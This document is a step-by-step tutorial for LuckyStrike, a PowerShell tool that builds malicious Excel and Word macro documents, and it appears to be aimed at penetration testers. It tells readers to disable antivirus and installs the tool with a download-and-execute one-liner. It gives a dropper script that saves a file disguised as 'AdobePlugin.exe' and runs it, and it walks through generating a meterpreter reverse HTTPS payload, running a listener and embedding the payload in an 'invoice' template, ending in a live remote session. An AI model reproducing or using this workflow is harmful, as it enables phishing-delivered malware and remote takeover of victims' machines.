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A PowerShell based utility for the creation of malicious Office macro documents. To be used for pentesting or educational purposes only.



LuckyStrike will likely trigger alerts from Windows Defender. It is recommended to either create a folder exception, or to completely disable the A/V.
  • Windows 7-10
  • PowerShell v5+ (you can check that with powershell -c "$PSVersionTable.PSVersion")
  • You must have Microsoft Excel installed
  • Install Invoke-Obfuscation in one of the locations reported by $env:PSModulePath
  • From an ADMINISTRATIVE PowerShell prompt, run the following command. A luckystrike folder will be created for you.
PS> Set-ExecutionPolicy Unrestricted


Still in a privileged Powershell session:

PS> cd C:\data\
PS> iex (new-object net.webclient).downloadstring('')
PS> cd .\luckystrike\
PS> .\luckystrike.ps1


  • Luckystrike will modify HKLM registry keys if necesary and must be run in administrator mode.
  • Remember to disable the A/V

If the installation went fine, you should have the following screen:

PS C:\data\luckystrike> .\luckystrike.ps1

    __               __            _____ __       _ __
   / /   __  _______/ /____  __   / ___// /______(_) /_____
  / /   / / / / ___/ //_/ / / /   \__ \/ __/ ___/ / //_/ _ \
 / /___/ /_/ / /__/ ,< / /_/ /   ___/ / /_/ /  / / ,< /  __/
/_____/\__,_/\___/_/|_|\__, /   /____/\__/_/  /_/_/|_|\___/

                ALL YOUR PAIN IN ONE MACRO.

                  2.0 - @curi0usJack

============= Main Menu ================

        1)  Payload Options
        2)  Catalog Options
        3)  File Options
        4)  Encode a PowerShell Command
        99) Exit


Example 1 - Launch calc from XLS

Add a payload to the catalog

Catalog options

Let's start by adding a payload to the catalog. To do that, first start luckystrike and select option 2 (Catalog Options):

PS C:\data\luckystrike> .\luckystrike.ps1

    __               __            _____ __       _ __
   / /   __  _______/ /____  __   / ___// /______(_) /_____
  / /   / / / / ___/ //_/ / / /   \__ \/ __/ ___/ / //_/ _ \
 / /___/ /_/ / /__/ ,< / /_/ /   ___/ / /_/ /  / / ,< /  __/
/_____/\__,_/\___/_/|_|\__, /   /____/\__/_/  /_/_/|_|\___/

                ALL YOUR PAIN IN ONE MACRO.

                  2.0 - @curi0usJack

============= Main Menu ================

        1)  Payload Options
        2)  Catalog Options
        3)  File Options
        4)  Encode a PowerShell Command
        99) Exit

Select: 2

Now, let's add a payload. Selection option 1 (Add payload to catalog):

Add payload

=========== Catalog Options ============

        1) Add payload to catalog
        2) Remove payload from catalog
        3) Show catalog payloads

        4) Add template to catalog
        5) Remove template from catalog
        6) Show catalog templates

        99) Back

Select: 1

At this stage, you will be required to enter information for the payload. In this example, we'll just pop up the calculator. Just enter "calc" in the title and leave the other fields empty.

Title: calc
Target IP [Optional]:
Target Port [Optional]:
Description (e.g. empire, windows/meterpreter/reverse_tcp, etc) [Optional]:

Choose payload type

Now, choose a payload type. Select option 1 (shell command), and add the command calc.exe:

Choose payload type:
        1) Shell Command
        2) PowerShell Script
        3) Executable
        4) COM Scriptlet
        98) Help
Selection: 1

Payload Text (the actual command to run): calc.exe

[+] - Payload added.

Back to initial menu

Now that we have created our payload, let's exit the menu (option 99) to get back to the initial menu, and select option 1 (payload options):

=========== Catalog Options ============

        1) Add payload to catalog
        2) Remove payload from catalog
        3) Show catalog payloads

        4) Add template to catalog
        5) Remove template from catalog
        6) Show catalog templates

        99) Back

Select: 99

Payload options

Select payload

Now, we need to select our payload. Select option 1 (select a payload):

============= Main Menu ================

        1)  Payload Options
        2)  Catalog Options
        3)  File Options
        4)  Encode a PowerShell Command
        99) Exit

Select: 1
=========== Payload Options ============

        1)  Select a payload
        2)  Unselect a payload
        3)  Show selected payloads
        99) Back

Select: 1

Document type

Select the document type (we'll choose option 1 to create an XLS document):

Please select the document type you wish to make:

        1)  xls
        2)  doc

Select: 1

Select the option that corresponds to the payload you have created before (option 1 in our case):

=========== Select Payload =============

        1)  calc
        99) Done.

Select: 1

Select infection method

Choose the infection method (option 1 - shell command):

======== Choose Infection Method =======

        1)  Shell Command
        2)  Metadata
        3)  DDE
        98) Help

Select: 1

[+] - Payload added!

Exit menu

The payload is now added. Let's exit the menu to get back to the start menu.

=========== Select Payload =============

        1)  calc
        99) Done.

Select: 99
=========== Payload Options ============

        1)  Select a payload
        2)  Unselect a payload
        3)  Show selected payloads
        99) Back

Select: 99

File options

Select file options

From here, we can generate our malicious file. Let's select option 3 (file options):

============= Main Menu ================

        1)  Payload Options
        2)  Catalog Options
        3)  File Options
        4)  Encode a PowerShell Command
        99) Exit

Select: 3

Generate file

Now, select option 1 to generate a new file:

=========== File Options ===============

        1)  Generate new file
        2)  Update existing file
        3)  Generate from template
        4)  Write existing macro code to file
        99) Back

Select: 1

[*] - Generating macro code.
[*] - Embedding payloads into workbook.
[+] - Success. File saved to C:\data\luckystrike\payloads\infected_EoHvbaKZ.xls

After a short while, the document is created and you are provided with the path.

Test the file

Notice that you'll need to click on the "Enable content" button to enable the macro when the XLS document opens, in order to launch the macro

Example 2 - Powershell dropper


In this example, we'll use a Powershell command that will download calc.exe from an external web server.

Let's save the following code in a file named drop-exec.ps1:

$dest = $env:TEMP + "\AdobePlugin.exe"
Start-BitsTransfer -Source -Destination $dest
Start-Process($env:TEMP + "\AdobePlugin.exe")

Add the payload to the catalog

Catalog options

PS C:\data\luckystrike> .\luckystrike.ps1

    __               __            _____ __       _ __
   / /   __  _______/ /____  __   / ___// /______(_) /_____
  / /   / / / / ___/ //_/ / / /   \__ \/ __/ ___/ / //_/ _ \
 / /___/ /_/ / /__/ ,< / /_/ /   ___/ / /_/ /  / / ,< /  __/
/_____/\__,_/\___/_/|_|\__, /   /____/\__/_/  /_/_/|_|\___/

                ALL YOUR PAIN IN ONE MACRO.

                  2.0 - @curi0usJack

============= Main Menu ================

        1)  Payload Options
        2)  Catalog Options
        3)  File Options
        4)  Encode a PowerShell Command
        99) Exit

Select: 2

=========== Catalog Options ============

        1) Add payload to catalog
        2) Remove payload from catalog
        3) Show catalog payloads

        4) Add template to catalog
        5) Remove template from catalog
        6) Show catalog templates

        99) Back

Select: 1

Title: calc from powershell

Target IP [Optional]:
Target Port [Optional]:
Description (e.g. empire, windows/meterpreter/reverse_tcp, etc) [Optional]:

Payload type

Choose payload type:
        1) Shell Command
        2) PowerShell Script
        3) Executable
        4) COM Scriptlet
        98) Help
Selection: 2

Enter full path to .ps1 file: c:\data\drop-exec.ps1

[+] - Payload added.

Back to initial menu

=========== Catalog Options ============

        1) Add payload to catalog
        2) Remove payload from catalog
        3) Show catalog payloads

        4) Add template to catalog
        5) Remove template from catalog
        6) Show catalog templates

        99) Back

Select: 99

Payload options

Select a payload

============= Main Menu ================

        1)  Payload Options
        2)  Catalog Options
        3)  File Options
        4)  Encode a PowerShell Command
        99) Exit

Select: 1

=========== Payload Options ============

        1)  Select a payload
        2)  Unselect a payload
        3)  Show selected payloads
        99) Back

Select: 1

Select document type

Please select the document type you wish to make:

        1)  xls
        2)  doc

Select: 1

Select powershell from the payloads

=========== Select Payload =============

        1)  calc
        2)  calc from powershell
        99) Done.

Select: 2

Infection method

======== Choose Infection Method =======

        1)  Cell Embed
        2)  Cell Embed-nonB64
        3)  Cell Embed-Encrypted
        4)  Cell Embed-Obfuscated
        98) Help

Select: 1

[+] - Payload added!

Back to initial menu

=========== Select Payload =============

        1)  calc
        2)  calc from powershell
        99) Done.

Select: 99

=========== Payload Options ============

        1)  Select a payload
        2)  Unselect a payload
        3)  Show selected payloads
        99) Back

Select: 99

File options

============= Main Menu ================

        1)  Payload Options
        2)  Catalog Options
        3)  File Options
        4)  Encode a PowerShell Command
        99) Exit

Select: 3
=========== File Options ===============

        1)  Generate new file
        2)  Update existing file
        3)  Generate from template
        4)  Write existing macro code to file
        99) Back

Select: 1

[*] - Generating macro code.
[*] - Embedding payloads into workbook.
[+] - Success. File saved to C:\data\luckystrike\payloads\infected_sz2U5CRo.xls

Example 3 - Executable

Prepare a reverse shell in Kali Linux

Let's prepare a reverse shell in Kali Linux:

$ msfvenom -p windows/meterpreter/reverse_https lhost= lport=8080 -f exe -o payload.exe

Transfer the resulting payload.exe file to the Windows machine where LuckStrike is installed.

On Kali Linux, run the following commands to start the listener:

$ msfconsole -q
msf> use multi/handler
msf> set payload windows/meterpreter/reverse_https
msf> set lhost
msf> set lport 8080
msf> set ExitOnSession false
msf> set AutoVerifySession false
msf> set AutoSystemInfo false
msf> set AutoLoadStdapi false
msf> exploit -j

Import the payload in LuckyStrike

Catalog options

PS C:\data\luckystrike> .\luckystrike.ps1

    __               __            _____ __       _ __
   / /   __  _______/ /____  __   / ___// /______(_) /_____
  / /   / / / / ___/ //_/ / / /   \__ \/ __/ ___/ / //_/ _ \
 / /___/ /_/ / /__/ ,< / /_/ /   ___/ / /_/ /  / / ,< /  __/
/_____/\__,_/\___/_/|_|\__, /   /____/\__/_/  /_/_/|_|\___/

                ALL YOUR PAIN IN ONE MACRO.

                  2.0 - @curi0usJack

============= Main Menu ================

        1)  Payload Options
        2)  Catalog Options
        3)  File Options
        4)  Encode a PowerShell Command
        99) Exit

Select: 2

Add payload to catalog

=========== Catalog Options ============

        1) Add payload to catalog
        2) Remove payload from catalog
        3) Show catalog payloads

        4) Add template to catalog
        5) Remove template from catalog
        6) Show catalog templates

        99) Back

Select: 1

Title: reverse https

Target IP [Optional]:
Target Port [Optional]:
Description (e.g. empire, windows/meterpreter/reverse_tcp, etc) [Optional]:

Choose payload type

Choose payload type:
        1) Shell Command
        2) PowerShell Script
        3) Executable
        4) COM Scriptlet
        98) Help
Selection: 3

Enter path to .exe file: c:\data\luckystrike\files\payload.exe

[+] - Payload added.

Return to main menu

=========== Catalog Options ============

        1) Add payload to catalog
        2) Remove payload from catalog
        3) Show catalog payloads

        4) Add template to catalog
        5) Remove template from catalog
        6) Show catalog templates

        99) Back

Select: 99

Payload options

============= Main Menu ================

        1)  Payload Options
        2)  Catalog Options
        3)  File Options
        4)  Encode a PowerShell Command
        99) Exit

Select: 1
=========== Payload Options ============

        1)  Select a payload
        2)  Unselect a payload
        3)  Show selected payloads
        99) Back

Select: 1

Please select the document type you wish to make:

        1)  xls
        2)  doc

Select: 1
=========== Select Payload =============

        1)  calc
        2)  calc from powershell
        3)  reverse https
        99) Done.

Select: 3

Infection method

======== Choose Infection Method =======

        1)  Certutil
        2)  Save To Disk
        3)  ReflectivePE
        98) Help

Select: 1

[+] - Payload added!

Return to main menu

=========== Select Payload =============

        1)  calc
        2)  calc from powershell
        3)  reverse https
        99) Done.

Select: 99
=========== Payload Options ============

        1)  Select a payload
        2)  Unselect a payload
        3)  Show selected payloads
        99) Back

Select: 99

File options

============= Main Menu ================

        1)  Payload Options
        2)  Catalog Options
        3)  File Options
        4)  Encode a PowerShell Command
        99) Exit

Select: 3
=========== File Options ===============

        1)  Generate new file
        2)  Update existing file
        3)  Generate from template
        4)  Write existing macro code to file
        99) Back

Select: 3
=========== Select Template ============

        1)  invoice
        99) Done.

Select: 1

[*] - Embedding payloads into workbook.
[!] - CLICK YES/CONTINUE TO ANY COMPATIBILITY WARNINGS! (look for a stupid popunder)
[+] - Success. File saved to C:\data\luckystrike\payloads\infected_template_bBtLo0E0.xls


Open the XLS document, click on "enable the content" to run the macro, and we now have a meterpreter session:

[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Starting persistent handler(s)...
[*] Started HTTPS reverse handler on
[*] handling request from; (UUID: arqlswbt) Staging x86 payload (177241 bytes) ...
[*] Meterpreter session 1 opened ( -> at 2020-07-31 11:44:32 +0200

msf5 exploit(multi/handler) > sessions 

Active sessions

  Id  Name  Type                     Information  Connection
  --  ----  ----                     -----------  ----------
  1         meterpreter x86/windows      -> (

msf5 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >